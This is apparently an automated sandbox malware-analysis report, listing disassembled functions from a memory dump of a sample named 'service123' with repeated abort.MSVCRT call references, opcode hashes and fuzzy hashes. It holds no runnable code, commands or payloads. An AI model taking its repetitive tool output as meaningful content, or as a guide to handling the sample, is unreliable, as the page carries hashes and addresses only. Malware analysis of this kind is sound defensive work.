abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1861606cb8756feb64d0d99d2e869bb7dc062ff7d0f100f7595a79cd346caf7c
Instruction ID: 20f0194c3f2271058d5d1b53d8d36b2ea2e6b8f3ca3ad7ecbe66a0488c1f75f6
Opcode Fuzzy Hash: 1861606cb8756feb64d0d99d2e869bb7dc062ff7d0f100f7595a79cd346caf7c
Instruction Fuzzy Hash: 60F06DB1545209CBE708FF18D4D4B6AB7B0FF12308F009A48C885ABB02C735E468CF91

Function 6C2E2AAD Relevance: 42.1, APIs: 28, Instructions: 65COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3B6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 70525e8c5b55fa431f930ae7df5c1b36a1f7fefbaa4851c2904f17a7620523a0
Instruction ID: 05ed000f291ef724669faba9b81218c64f3bbfc69d13fd7da13cb725bd20588b
Opcode Fuzzy Hash: 70525e8c5b55fa431f930ae7df5c1b36a1f7fefbaa4851c2904f17a7620523a0
Instruction Fuzzy Hash: 0EF09AB154520A8BD744EF18C090B6AB770FF12308F00A948C845ABE02CB31E468CF82

Function 6C2EB930 Relevance: 40.6, APIs: 27, Instructions: 135COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 0999a410ed7956fddf9f659c4d85f3e6218786fd5be38b41d151845747d50e8e
Instruction ID: 717d686e377f3d9f0ff98c259c28191107699825f8edf3b3f6c6d18ca139a54b
Opcode Fuzzy Hash: 0999a410ed7956fddf9f659c4d85f3e6218786fd5be38b41d151845747d50e8e
Instruction Fuzzy Hash: 5C31243024970E9FC700DE59C491796B3A5EB4D310F80892AEE54A7B42D334A8589F58

Function 6C2EBFCC Relevance: 39.1, APIs: 26, Instructions: 63COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction ID: 6571e7ba6b51366cc85c6dcdfcd02f16bf9f013f5d46b991589657e048b0f43f
Opcode Fuzzy Hash: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction Fuzzy Hash: ADF027309DC22F8AC7043B5D44109A5B7377A6F70DBDA0859EC807BE19D2219847CE49

Function 6C2EBEE7 Relevance: 37.6, APIs: 25, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 176b5340d6c047df29a4ae0ea307cdca161f836c40fccfc101a0aadc63027d45
Instruction ID: 68c73f4b9f394be3303087573a907e42708c605f38da7e2d260e798e8f7caa57
Opcode Fuzzy Hash: 176b5340d6c047df29a4ae0ea307cdca161f836c40fccfc101a0aadc63027d45
Instruction Fuzzy Hash: 6001BD73A45B2F03E3044E74C4E0321B6A25B86318F48876DED7137E8BC23498199F44

Function 6C2EBC1B Relevance: 37.6, APIs: 25, Instructions: 55COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction ID: 220bd14c56b930699e48b76c3e3ccc8f08b002b5aab73b4fc90dbbd1353f0e22
Opcode Fuzzy Hash: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction Fuzzy Hash: C8E08C32A8A31E4BC5107E98B4504AAF3699B56358F511C2CCD18B3D02D362E8A88ECA

Function 6C2EBE00 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction ID: 846fdc3d0a48bc4e2c5dd5b245f20f92c968fcb310019e36b2ffae418a87b3f6
Opcode Fuzzy Hash: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction Fuzzy Hash: 9CD0A53059D21F47C7047F1C4054C6DF3F55B463087595C58C845F3D05D631D9564D04

Function 6C2EBE70 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
